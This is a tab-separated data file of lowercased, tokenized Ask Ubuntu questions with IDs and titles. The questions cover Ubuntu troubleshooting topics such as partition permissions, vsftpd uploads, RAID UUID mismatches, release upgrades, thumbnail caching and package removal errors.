518833	how to access locked hard drive ?	i have a hard drive with an old 12.04 server install and a data partition on it . i have the hard drive hooked up to my current desktop using a usb to sata adapter with external power supply . i am on my 12.04 ubuntu os install on my desktop . i am able to open the server install partition but whenever i try to access the data partition it says : this location could not be displayed , you do not have the permissions necessary to view the contents of “c436695a-0830-4e33-b6c6-61a54d801ab1 '' . is there a solution to this besides re-formatting ? still having trouble so if anyone could be more specific that would be nice . the output of lsblk is : user1 @ user1-hp-pavilion-dv6000-rg279ua-aba : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 74.5g 0 disk ├─sda1 8:1 0 19.5g 0 part ├─sda2 8:2 0 1k 0 part ├─sda3 8:3 0 9.8g 0 part ├─sda5 8:5 0 9.8g 0 part /media/5058-f505 ├─sda6 8:6 0 2g 0 part ├─sda7 8:7 0 14g 0 part ├─sda8 8:8 0 2g 0 part │ └─cryptswap1 ( dm-0 ) 252:0 0 2g 0 crypt [ swap ] └─sda9 8:9 0 15.9g 0 part / sdb 8:16 0 149.1g 0 disk ├─sdb1 8:17 0 18.6g 0 part /media/71d5ea0b-d815-4756-ba29-2391b13f8285 ├─sdb2 8:18 0 1k 0 part ├─sdb5 8:21 0 121.1g 0 part /media/c436695a-0830-4e33-b6c6-61a54d801ab1 └─sdb6 8:22 0 2.8g 0 part sr0 11:0 1 1024m 0 rom sdb5 is the partition i 'm trying to access . i named it /mnt/ownclouddata when setting it up on the server . output of ls -la /media : total 24 drwxr-xr-x 5 root root 4096 sep 13 04:29 . drwxr-xr-x 24 root root 4096 aug 5 12:56 .. drwx -- -- -- 7 user1 user1 8192 dec 31 1969 5058-f505 drwxr-xr-x 3 root root 4096 sep 2 02:01 71d5ea0b-d815-4756-ba29-2391b13f8285 drwxrwx -- - 4 root www-data 4096 nov 13 2013 c436695a-0830-4e33-b6c6-61a54d801ab1
518835	vsftpd : 553 could not create file with root group	i have looked around for the last hour and reinstalled vsftpd twice but have not found success yet . i created a new user `` admin '' and assigned it to the root group . i want 'admin ' to have full access to everything , yes i am aware of the security concerns . then , i logged into the ftp server with the 'admin ' user and tried to write to /var/www . i got 553 : could not create file . is n't the point of the root group having full read+write permissions ? in the /etc/group file , at the top is : root : x:0 : root , admin here 's my vsftpd configuration : anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 dirmessage_enable=yes xferlog_enable=yes connect_from_port_20=yes dual_log_enable=yes xferlog_std_format=yes listen=yes pam_service_name=vsftpd userlist_enable=yes tcp_wrappers=yes
518839	unity scrolling is too fast	just installed 14.04 and tried stackoverflow . the mouse wheel scrolls a full-screen for a wheel click , and this is too much for me . i am loosing my way around web pages . is there a way to make unity scroll less than a screenful per each wheel-click ? in other words i need visual continuation when scrolling .
518840	ubuntu 14 on vps processes keeps getting killed	i 've just bought a vps from ipxcore . when i try to run bitcoind it gets killed after about 10s . dmesg retruns nothing at all , also strange ! any idea what might be wrong ? checked memory usage with htop , does not seem to max out
518841	problem in overwriting previously installed version	i was installing ubuntu 14.04 via bootable usb then a error was shown regarding cd/dvd problem and got failed . previously i was using ubuntu 12.04 , i wanted to update it , so during installation i deleted previous ubuntu to install new one in the same drive . now since i had deleted old ubuntu and new is not installed , there is no bootable operating system in my hard disk and further installing is getting very slow and sometimes it stucks to dell logo . i fear to loose data . i tried to install again but installer is not proceeding after wireless connection screen , it shows only cursor in loading state . what should i do to avoid loose of data
518842	turning on monitor mode on ubuntu 14.04 using bcm43142	i 'm using ubuntu 14.04 on dell vostro 3446 and i 'm unable to turn on the monitor mode on my wlan . did an lspci which returned the following broadcom driver in use : network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) . been searching on it for a week now ! everywhere it is written that i need to patch my drivers but i 'm unable to find the right patch . on aircrack 's website , it is written that broadcom devices can be patched with b43 patch injection now but after researching a bit i have found out that my devices is not supported by b43 driver . they have mentioned http : //www.latinsud.com/bcm/bcm43xx-injection-linux-2.6.20.patch < - this link to download the patch but this link does n't work . please ping if you know the right patch and procedure for my device . thank you !
518844	screen resolution for 14.04 + display lists only 1024x768	i am using ubuntu 14.04 on dell 1749 laptop , do not know what happened and i am not able to control brightness , and i can not in choose other resolutions than 1024x768 . processor : i3 ram : 6gb os type : 64 bit graphic card : vesa intel ironlake mobile xrandr lists only 1024x768 mode .
518845	php script unable to create directory with 777 permissions	i have a script that automatically creates a directory if it does n't exist and sets permissions to 777 . the problem is , it 's only setting permissions to 755 : if ( ! file_exists ( $ this- > get_upload_dir ( ) ) ) mkdir ( $ this- > get_upload_dir ( ) , 0777 ) ; if i check the owner of the directory it created , it shows www-data [ 33 ] . i 'm not sure what the 33 means . is www-data the user the server uses to create directories ? if so , how can i allow it to create a directory with 777 permissions ? also note , i have already set the following command : sudo chown -r www-data : www-data /var/www/html
518846	eclipse typing slowly	i 'm using ubuntu 14.04.1 and eclipse luna with oracle java 8 . when i edit a file , eclipse types very slowly . there is a noticeable delay between when i type a word and when that word appears on the screen . everything else in eclipse seems to work normally though . overall , it runs faster than eclipse on my windows 7 partition . when i type something that 's not in a file such as naming a new project , it types normally . i 've tried reinstalling eclipse , editing the eclipse.ini file and changing settings but nothing seems to work .
518848	switching kde activities in command line	i started taking a course on bash scripting , and i 'm still a newbie in bash scripting ... please i wa n't to know whether it 's possible to control and switch kde activities in kubuntu via the command line i.e a command to switch between different activities ... thanks
518851	headphones not working after update ubuntu 14.04.1	i have tried all the forum threads here concerning this problem , none of the provided solutions worked ( some even made the problem worse ) . i have an asus x551m laptop with sonicmaster audio . ubuntu 14.04 worked fine with both the headphones and internal speaker . after updating to 14.04.1 , my headphone jack stopped working but the internal speaker is working fine .
518854	chrubuntu only allows wifi access from one source ?	ok so this has happened multiple times on multiple installs so i know this is n't a glitch oranything . i guess this is how it was programmed . i downloaded chrubuntu and the first wifi source i use to connect ( e.g . work ) will be fine . however once i go home or to a friends house and connect , no other wifi source will work . it will connect although it wo n't load any web pages etc . it 's extremely weird . if i uninstall chrubuntu and reinstall , and select the new wifi ( e.g . if first install was work , and i go home and reinstall and select home network ) it will work . this obviously is horrible . please help : ) .
518856	upgrade 12.10 sources.list	i have used deb http : //old-releases.ubuntu.com/ubuntu/ quantal main restricted and the like in my sources.list . i want to try an upgrade but not sure how to fix my sources.list file . this is my backup , but it gives me a load of 404 and no upgrade option . any way to fix ? â as in : what sources.list file to use for an upgrade from 12.10 ? # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //no.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //no.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //no.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal universe deb http : //no.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //no.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //no.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //no.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //no.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src http : //extras.ubuntu.com/ubuntu quantal main # me added deb http : //apt.izzysoft.de/ubuntu generic universe # spotify deb http : //repository.spotify.com stable non-free # sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys xxxxxxxxx # sudo apt-get update # sudo apt-get install spotify-client # deb http : //www.deb-multimedia.org stable main non-free deb http : //deb.torproject.org/torproject.org quantal main deb http : //archive.canonical.com/ quantal partner deb-src http : //archive.canonical.com/ quantal partner
518860	degraded mdadm raid5 array & array uuids mismatch ( ubuntu 14.04.1 )	every reboot on my server results in a halt due to a degraded raid5 ( software ) array . the same drive /dev/sdc appears to be dropping out each time . i ignore and boot with a degraded array any ways . to get the array rebuilding again with the drive i issue the command : sudo mdadm /dev/md0 -- add /dev/sdc and with this i can see : cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sdc [ 4 ] sdd [ 3 ] sdb [ 1 ] 2930014752 blocks super 1.2 level 5 , 4k chunk , algorithm 2 [ 3/2 ] [ _uu ] [ ==== > ... ... ... ... ... . ] recovery = 24.8 % ( 363686144/1465007376 ) finish=213.2min speed=86050k/sec unused devices : < none > during the rebuild process i can see the array uuid is different on the /dev/sdc drive and the third drive partition is not listed : sudo mdadm -- examine /dev/sd [ bcd ] 1 | egrep 'uuid|dev' /dev/sdb1 : array uuid : 1a000a97:9257df81:4a6ccde8 : c6b9b3f5 device uuid : f7dd3752:8e28c48e : ae389924:9f42b503 device role : active device 1 /dev/sdd1 : array uuid : 1a000a97:9257df81:4a6ccde8 : c6b9b3f5 device uuid : 63031869 : ecade3ac:2738fbdf:3f1af144 device role : active device 2 third drive is listed here though , sudo mdadm -- examine /dev/sd [ bcd ] | egrep 'uuid|dev' /dev/sdb : array uuid : 4918dc9c : b21aa70f:21db4067:388cc3a3 device uuid : 5f9355e9 : c370e7e2 : fb03fe3d:969fda6e device role : active device 1 /dev/sdc : array uuid : 4918dc9c : b21aa70f:21db4067:388cc3a3 device uuid : 10f27f1c:7c00915a : cb1a9c17 : e3722644 device role : active device 0 /dev/sdd : array uuid : 4918dc9c : b21aa70f:21db4067:388cc3a3 device uuid : 16879ff2:02f73bc3 : d2bd7b04:86fd8098 device role : active device 2 i have also noticed that the array uuid of /dev/sdc is the same as what is in /etc/mdadm/mdadm.conf grep array /etc/mdadm/mdadm.conf array /dev/md/0 metadata=1.2 uuid=4918dc9c : b21aa70f:21db4067:388cc3a3 name=ubuntu-nas:0 sudo mdadm -- detail -- scan array /dev/md/0 metadata=1.2 spares=1 name=ubuntu-nas:0 uuid=4918dc9c : b21aa70f:21db4067:388cc3a3 sudo blkid returns the uuid of the other two drives in the array as the same uuid : sudo blkid /dev/sdd1 : uuid= '' 1a000a97-9257-df81-4a6c-cde8c6b9b3f5 '' uuid_sub= '' 63031869-ecad-e3ac-2738-fbdf3f1af144 '' label= '' ubuntu-nas:0 '' type= '' linux_raid_member '' /dev/sdb1 : uuid= '' 1a000a97-9257-df81-4a6c-cde8c6b9b3f5 '' uuid_sub= '' f7dd3752-8e28-c48e-ae38-99249f42b503 '' label= '' ubuntu-nas:0 '' type= '' linux_raid_member '' /dev/sdc : uuid= '' 4918dc9c-b21a-a70f-21db-4067388cc3a3 '' uuid_sub= '' cb23ee6c-3bd6-7ade-272c-b3808162cbd0 '' label= '' ubuntu-nas:0 '' type= '' linux_raid_member '' /dev/md0 : uuid= '' 6a5fffe8-aba0-4ee2-b74b-20f7d735eedd '' type= '' ext4 '' is there something wrong with my uuid of the array ? why is the array uuid of the dropped drive showing up as what is in /etc/mdadm/mdadm.conf ? what should the uuid of my array say for all of my drives ? what should i put in the /etc/fstab ? grep /dev/md0 /etc/fstab /dev/md0 /media/nas/ ext4 defaults , noatime , nobootwait 0 2 i have also discovered that the array may have assembled incorrectly . my data is there and i can access it but when i run sudo mdadm -- examine -- scan -v i show two different arrays with the same /dev/md/0 and differnt uuids . looks like one array is created with the whole disk and the other is with the partitions . how do i fix this without losing my data ? ? sudo mdadm -- examine -- scan -v array /dev/md/0 level=raid5 metadata=1.2 num-devices=3 uuid=4918dc9c : b21aa70f:21db4067:388cc3a3 name=ubuntu-nas:0 devices=/dev/sdd , /dev/sdc , /dev/sdb array /dev/md/0 level=raid5 metadata=1.2 num-devices=3 uuid=1a000a97:9257df81:4a6ccde8 : c6b9b3f5 name=ubuntu-nas:0 devices=/dev/sdd1 , /dev/sdb1
518861	after installing ubuntu 14.04 it shows the disk drive is not ready or not present	i have installed ubuntu 14.04 . but when i restart then it shows that `` the disk drive is not ready or not present '' . how can i solve this problem ? ? ?
518862	lubuntu unable to arrange desktop icons ?	i am able to arrange the icons on my desktop by name if i have the panel at the bottom of the screen , but the moment i put it on the top of the screen it messes up my files and puts them with spaces in between them and i am unable to arrange them at all . this is what it looks like normally : http : //postimg.org/image/dl0w5uomj/ and this is what happens when i move the panel to the top of the page : http : //postimg.org/image/w1vawo4kr/
518865	ubuntu 14.04lts install/ driver support for hp 15-ga004au	i have go the laptop mentioned in the titile . it has very unacceptable performance due to low ram . i want to install 14.04 ( 32bit ) for some smoother operation . however , after lots of surfing on the net i cant really find anything specifically saying that installing ubuntu on the above laptop will work like butter smooth . things like non-compatible drivers haunt me . the laptop does come in a pre-installed ubuntu version , but mine is the windows 8.1 one . will 32 bit , 14.04 be okay for my laptop ? i dont wantto waste time installing on it then realize that it does not feature good driver support , example ; wifi , ethernet . webcam etc ...
518866	i am unable to download eglibc 2.14 source through svn as www.eglibc.org seems to be down since the last 2 days . is there an alternate way ?	i am trying to build a cross-compiler using crosstool-ng 1.12.2 . it bails out while trying to download the eglibc 2.14 packages . here is the log : debug ] == > executing : 'svn ' 'export ' '-r ' 'head ' 'http : //www.eglibc.org/svn/branches/eglibc-2_14/libc ' 'eglibc-2_14' [ warn ] could not retrieve 'eglibc-2_14' [ error ] [ error ] > > build failed in step 'retrieving needed toolchain components ' tarballs' [ error ] > > [ error ] > > error happened in : do_libc_get [ scripts/build/libc/eglibc.sh ] [ error ] > > called from : main [ scripts/crosstool-ng.sh @ 530 ] here is the result from ping : ping eglibc.org ( 67.207.128.95 ) 56 ( 84 ) bytes of data . -- - eglibc.org ping statistics -- - 41 packets transmitted , 0 received , 100 % packet loss , time 40000ms
518867	delay while recording piano input	i connected my digital piano to my laptop via a jack cable and an usb sound card adapter . after running pactl load-module module-loopback latency_msec=1 i am able to hear live sounds from piano . also , i can record them using audacity . a major problem that i have is that they are just a little bit delayed . that affects song recording so i can not follow the song rhythm properly . is there any way to fix this problem ? maybe installing low latency kernel ? how can i do that ?
518869	ubuntu server 14.04.1 lts wont install any packages after reboot	i just installed ubuntu server 14.04.1 lts on my old gaming pc to run a file server on . i got it all installed on the pc and was able to apt-get update and apt-get upgrade and install samba , openssh-server , smbclient , cifs-utils , ntp and ntpdate . i set up /etc/network/interfaces : . everything looks right in there and i was still able to install packages and everything . now , when i reboot the computer i try to install ddclient and i get : now i get this no matter what i try to install or update or upgrade . any help would be appreciated !
518871	roswell rnx-n250pce card stops working in 14.04	i updated to 14.04 and my internet works for a short while then quits . the card says that it is still connected to the router . i 'm a newbie so i 'm not sure how to start trouble shooting this . i have attempted to apply a couple of fixes but so far no go !
518873	how to fix xubuntu 14.04 screen flicker that started after update ?	every few seconds the entire screen flickers . this began after updates over the weekend ( 30-31 august ) . the machine is a toshiba satellite p200d , 2gb , amd turion 64x2 running xubuntu 14.04 . things i 've tried : restart and cold start . display compositing on or off makes no difference . screen refresh is 60 hz , i get no alternatives to this on the pull down . ( note : if i set resolution to any non-native size screen refresh sets itself to 59.8 hz . ) after reading forums i tried installing compton and typing compton -- vsync opengl . no effect .
518874	upgrading to a no longer supported version	as per my previous question the issue i hoped would be resolved persist . issue is that by upgrade i get the option to upgrade to 13.10 . however 12.10 , which i 'm currently running , ended in may of 2014 – the “supplied” version is 13.10 , but this one ended in july of 2014 ! what to do now ? really hoped i could , for once , do an upgrade and not , yet again , buy a new hdd for upgrade ... with the days of work that this entails : p should i upgrade to 13.10 and then to 14.10 or 14.04 or is this a dead end . is it a high risk operation etc. ? ca n't post image so here is an ascii version of dialogue [ »« ] [ software updater ] _x | | | | + -- -- -- -+ software updates are no longer provided for ubuntu | | | ^ | 12.10 | | | # | | | + -- -- -- -+ | | to stay secure , you should upgrade to ubuntu 13.10 | | | | [ settings ... ] [ upgrade ... ] [ ok ] | | | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + after [ upgrade ... ] : = upgrading to a no longer supported version = you are about to upgrade to a version of ubuntu that is no longer supported . the target release of ubuntu is ' '' no longer supported '' ' by canonical . the support timeframe is between 9 month and 5 years after the initial release . you will not receive security updates or critical bugfixes . see http : //www.ubuntu.com/releaseendoflife for details . it is still possible to upgrade this version and eventually you will be able to upgrade to a supported release of ubuntu . alternatively you may want to consider to reinstall the machine to the latest version , for more information on this , visit : http : //www.ubuntu.com/desktop/get-ubuntu for pre-installed system you may want to contact the manufacturer for instructions . == feedback and helping == if you would like to help shape ubuntu , take a look at the list of ways you can participate at http : //www.ubuntu.com/community/participate/ your comments , bug reports , patches and suggestions will help ensure that our next release is the best release of ubuntu ever . if you feel that you have found a bug please read : http : //help.ubuntu.com/community/reportingbugs then report bugs using apport in ubuntu . for example : ubuntu-bug linux will open a bug report in launchpad regarding the linux package . if you have a question , or if you think you may have found a bug but are n't sure , first try asking on the # ubuntu or # ubuntu-bugs irc channels on freenode , on the ubuntu users mailing list , or on the ubuntu forums : http : //help.ubuntu.com/community/internetrelaychat http : //lists.ubuntu.com/mailman/listinfo/ubuntu-users http : //www.ubuntuforums.org/ == more information == you can find out more about ubuntu on our website , irc channel and wiki . if you 're new to ubuntu , please visit : http : //www.ubuntu.com/ to sign up for future ubuntu announcements , please subscribe to ubuntu 's very low volume announcement list at : http : //lists.ubuntu.com/mailman/listinfo/ubuntu-announce
518875	macbook pro volume keys not working	macbook pro 5,4 volume hot keys no longer change the volume . numerous reboots , remapping of the keys in system settings , still not working . mute key works fine but volume up and down are not responsive . the actual keystrokes register ie : keyboard settings . this happened suddenly without rebooting a couple weeks ago after previously working without issue in 13.10 then 14.04 for a little while/
518879	sshd daemon not running ubuntu 12.04	the sshd daemon is not running on my machine ( ubuntu 12.04 ) . i have repeatedly re-installed the openssh server and rebooted . i get no output to this command : ps -a | grep sshd any help would be greatly appreciated .
518882	sound/video asynchrony while playing rmvb files in totem/videos - ubuntu 14.04	first of all , i apologize if this has already been asked and solved , but honestly i could n't find anything , so if that 's the case please link to the proper answer . anyway , i just installed 14.04 ( fresh install ) , and i noticed that when playing rmvb files in `` videos '' ( previously known as `` totem '' ) , there is an asynchrony between sound and video . the sound is too slow for the video , or the video is too fast for the sound ( same effect , sound is far behind the video ) . it starts out normally , but as the video goes on , the asynchrony becomes more and more noticeable . however , the sound itself is not noticeably slower/distorted and , at first glance , the video does n't seem to be sped up either , though something must be happening as it gets way ahead of the soundtrack as the playback progresses . this is happening only with rmvb files , so far . it is not a problem with the files , because the same files played ok under 13.04 . other formats such as mp4 , webm , wmv , play fine . installing and using vlc instead is not an answer/option . the files play fine in vlc , but i prefer totem/videos . i have already reinstalled totem , tried it after another fresh install , both before and after updating , also before and after installing restricted extras , bad and ugly gstreamer , etc . same result . so , has anyone come across this before and is there a solution ? thank you very much in advance .
518886	lubuntu-desktop not working on ubuntu 14.04	i recently decided to install lxde on my ubuntu 14.04 ( it 's not a fresh installation , however it 's quite recent ) . i wanted to use mainly unity and use lxde sometimes when i needed higher performance . following a guide to do this , i used : sudo apt-get lubuntu-desktop for getting the lubuntu flavor . after everything finished i shutdown the computer , for some reason . to my surprise , the shutdown screen as well as the boot one has the lubuntu logo instead of the ubuntu one . a minor annoyance as it was nowhere written this would be one of the effects . then , contrary to what i was made to believe , the login screen is the lubuntu one . i could n't find any way to choose the desktop environment from there so i just log in . after i login i see that the desktop is still unity . to sum up : my lxde installation made my ubuntu believe it was lubuntu , but left the only aspect i installed it for unsolved . after this experience , i decided to uninstall it using these commands : sudo apt-get autoremove lxde sudo apt-get autoremove lubuntu-desktop sudo apt-get -- purge remove lxde sudo apt-get -- purge remove lubuntu-desktop the last two were not necessary , apparently . these operations left the situation unchanged . it also appears that the lubuntu login screen just covers up the ubuntu one as for a brief second it appeared after logging in . so my questions are : if and how can i reset my system to its former state , and can i then install lxde with the ability to choose between the des and hopefully be able to use the programs from unity on lxde ( ideally without installing its own software again ) ? thanks in advance
518887	avconv recording with built in camera stopped working when i upgraded from ubuntu 12 lts to ubuntu 14	i used following command to capture video from my built in camera avconv -f alsa -i pulse -f video4linux2 -r 25 -s 1280x720 -i /dev/video0 -vcodec libx264 -pre:0 ultrafast dud.mkv -loglevel quiet and it worked perfectly under precise pangolin however when i upgraded to trusty tahr , this same command broke down . the actual frame rate is much smaller ( around 6fps , definitely not 25fps ) . anybody any idea how to solve this ? clearly the camera supports the format , could it be the driver got screwed up ? thanks
518888	can not select all by mouse under list view in nautilus	i suddenly find this problem when i select `` view items as a list '' i can not able to select all by using mouse . is this a natural behavior or that is a bug ?
518889	how to disable thumbnail generation ?	for privacy and security reasons i want to disable the generation of any thumbnails in the ~/.cache/thumbnails folder ( using ubuntu 14.04 lts ) . i already tried this ( without success ) : in the filemanager `` files '' ( edit ► preferences ) in the `` preview '' -tab i switched `` show thumbnails '' to `` never '' . result : thumbails are not shown in the filemanager but still be generated in the ~/.cache/thumbnails/normal/ folder when i open some pictures with the `` image viewer '' = fail ! i used the dconf-editor and set org ► gnome ► desktop ► thumbnail-cache ► maximum-age to 0 and maximum-size to 0 . result : the same as the 1. try = fail ! in the dconfeditor i set the option org ► gnome ► desktop ► thumbnailers ► disable-all . result : thumbnails of viewed pictures still be generated = fail ! a little bit weird solution i found is to delete the ~/.cache/thumbnails folder and than link it to /dev/null to avoid thumbnails are written to the hard disk : rm -r ~/.cache/thumbnails & & ln -s /dev/null ~/.cache/thumbnails i really ca n't believe that this is the only solution to really disable the thumbnail generation !
518890	how to run correctly bash script from another script ?	i want to run sqldeveloper on ubuntu gnome 14.04 . i created some symbolic link and tried to call from one script file another . and it fail with message : /usr/local/bin/sqldeveloper : line 2 : cd : /usr/local/bin/sqldeveloper/bin : not a directory here is my spteps : linking over an in-path launcher for oracle sql developer : sudo ln -s /opt/sqldeveloper/sqldeveloper.sh /usr/local/bin/sqldeveloper edit /usr/local/bin/sqldeveloper.sh replace it 's content to : # ! /bin/bash unset gnome_desktop_session_id sh sqldeveloper_launcher.sh content of sqldeveloper_launcher.sh : # ! /bin/bash cd /opt/sqldeveloper/sqldeveloper/bin ./sqldeveloper `` $ @ '' run sql developer is next : sqldeveloper but if i put content of sqldeveloper_launcher.sh into sqldeveloper.sh it works ( it means that it really running sqldeveloper , but it fails at runtime with error ca n't run sqldeveloper on ubuntu ) . how to solve this trouble ?
518893	in the ubuntu sdk , is there a way to view all global variables in current project ?	in the ubuntu sdk , is there a way to view all global variables in current project ? working on one of the core apps , and i want to figure out if any global variables have been defined for the current time .
518895	is .ogg for audio or for video format ?	what is the .ogg format ? is that used for audio files or used for video files ? i found two examples in /usr/share/example-content/ubuntu_free_culture_showcase
518897	how do you remove a `` bad '' installation of xboxdrv-ubuntu	i tried to use xboxdrv-ubuntu today . i think the install is corrupted , because there is no joystick thing in the settings ( worked quite a few days ago ) , joysticks are n't detected , etc . the application still runs , but does n't seem to be complete compared to how it used to be . installing it again says it 's already installed and aborts . uninstallation : xboxdrv uninstalls successfully with sudo apt-get purge xboxdrv the following is output : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : jstest-gtk linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-image-3.13.0-32-generic linux-image-extra-3.13.0-32-generic primus-libs socat use 'apt-get autoremove ' to remove them . the following packages will be removed : ubuntu-xboxdrv* xboxdrv* 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . after this operation , 1,820 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 256045 files and directories currently installed . ) removing ubuntu-xboxdrv ( 20140707-1 ) ... stop : unknown instance : dpkg : error processing package ubuntu-xboxdrv ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 dpkg : xboxdrv : dependency problems , but removing anyway as you requested : ubuntu-xboxdrv depends on xboxdrv . afterwards , i attempted to remove ubuntu-xboxdrv as follows : sudo apt-get purge ubuntu-xboxdrv the results i got were these : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : jstest-gtk linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-image-3.13.0-32-generic linux-image-extra-3.13.0-32-generic primus-libs socat use 'apt-get autoremove ' to remove them . the following packages will be removed : ubuntu-xboxdrv* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 71.7 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 255996 files and directories currently installed . ) removing ubuntu-xboxdrv ( 20140707-1 ) ... stop : unknown instance : dpkg : error processing package ubuntu-xboxdrv ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after this , i typed sudo apt-get autoremove the results are excessively long to put in a block , so here 's the output : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : ubuntu-xboxdrv : depends : xboxdrv but it is not installed e : unmet dependencies . try using -f. followed up with : sudo apt-get autoremove -f results ( also too long to block with each line ) reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : xboxdrv the following packages will be removed : linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-image-3.13.0-32-generic linux-image-extra-3.13.0-32-generic primus-libs socat the following new packages will be installed : xboxdrv 0 upgraded , 1 newly installed , 6 to remove and 0 not upgraded . need to get 0 b/663 kb of archives . after this operation , 270 mb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 255996 files and directories currently installed . ) removing linux-headers-3.13.0-32-generic ( 3.13.0-32.57 ) ... removing linux-headers-3.13.0-32 ( 3.13.0-32.57 ) ... removing linux-image-extra-3.13.0-32-generic ( 3.13.0-32.57 ) ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic update-initramfs : deleting /boot/initrd.img-3.13.0-32-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-35-generic found initrd image : /boot/initrd.img-3.13.0-35-generic found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.13.0-32-generic found linux image : /boot/vmlinuz-3.13.0-35-generic found initrd image : /boot/initrd.img-3.13.0-35-generic found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.13.0-32-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done removing linux-image-3.13.0-32-generic ( 3.13.0-32.57 ) ... examining /etc/kernel/prerm.d . run-parts : executing /etc/kernel/prerm.d/dkms 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic dkms : removing : nvidia-331 331.38 ( 3.13.0-32-generic ) ( x86_64 ) -- -- -- -- uninstall beginning -- -- -- -- module : nvidia-331 version : 331.38 kernel : 3.13.0-32-generic ( x86_64 ) status : before uninstall , this module version was active on this kernel . nvidia_331.ko : - uninstallation - deleting from : /lib/modules/3.13.0-32-generic/updates/dkms/ - original module - no original module was found for this module on this kernel . - use the dkms install command to reinstall any previous module version . depmod ... .. dkms : uninstall completed . examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic update-initramfs : deleting /boot/initrd.img-3.13.0-32-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-32-generic /boot/vmlinuz-3.13.0-32-generic generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-35-generic found initrd image : /boot/initrd.img-3.13.0-35-generic found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.13.0-35-generic found initrd image : /boot/initrd.img-3.13.0-35-generic found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done removing primus-libs : amd64 ( 20131127-1~trustyppa1 ) ... removing socat ( 1.7.2.3-1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for doc-base ( 0.10.5 ) ... processing 1 removed doc-base file ... 